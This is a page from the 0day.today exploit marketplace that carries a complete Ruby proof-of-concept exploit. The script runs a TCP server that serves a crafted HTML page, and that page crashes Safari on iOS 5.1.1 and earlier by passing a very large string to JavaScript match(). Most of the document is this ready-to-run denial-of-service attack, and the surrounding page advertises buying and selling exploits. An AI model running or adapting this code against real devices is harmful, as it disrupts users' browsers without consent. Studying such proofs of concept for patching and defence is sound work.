0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
iOS 5.1.1 Safari Browser Denial Of Service
[#!/usr/bin/env ruby
# - Title
# iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC
# - Author
# Alberto Ortega @a0rtega
# alberto[@]pentbox[.]net
# - Summary
# A vulnerability has been discovered in Apple Safari Browser
# included in the last version of iOS (5.1.1).
#
# Previous versions may be affected too.
#
# When JavaScript function match() gets a big buffer as
# parameter the browser unexpectedly crashes.
#
# By extension, the function search() is affected too.
#
# Tested on iOS 5.0.1, 5.1.0, 5.1.1
# Tested on iPod Touch, iPhone and iPad iOS devices.
require "socket"
require "optparse"
# Buffer values
chr = "A"
# The size of buffer needed may vary depending
# on the device and the iOS version.
buffer_len = 925000
# Magic packet
body = "\
<html>\n\
<head><title>Crash PoC</title></head>\n\
<script type=\"text/javascript\">\n\
var s = \"poc\";\n\
s.match(\"#{chr*buffer_len}\");\n\
</script>\n\
</html>";
def help()
puts "iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC"
puts "#{$0} -p bind_port [-h bind_address] [--verbose]"
end
# Parsing options
opts = {}
optparser = OptionParser.new do |op|
op.on("-h", "--host HOST") do |p|
opts["host"] = p
end
op.on("-p", "--port PORT") do |p|
opts["port"] = p
end
op.on("-v", "--verbose") do |p|
opts["verbose"] = true
end
end
begin
optparser.parse!
rescue
help()
exit 1
end
if (opts.length == 0 || opts["port"] == nil)
help()
exit 1
end
if (opts["verbose"] != nil)
debug = true
else
debug = false
end
if (opts["host"] != nil)
host = opts["host"]
else
host = "0.0.0.0"
end
port = opts["port"]
# Building server
if debug
puts "Buffer -> #{chr}*#{buffer_len}"
end
begin
serv = TCPServer.new(host, port)
puts "Listening on #{host}:#{port.to_s} ..."
rescue
puts "Error listening on #{host}:#{port.to_s}"
exit 1
end
begin
s = serv.accept()
if debug
puts "Client connected, waiting petition ..."
end
data = s.recv(1000)
if debug
puts "Sending crafted packet ..."
end
s.print(body)
if debug
puts "Closing connection ..."
end
s.close()
puts "Done!"
rescue
puts "Error sending data"
exit 1
end
# 0day.today [2024-11-14] #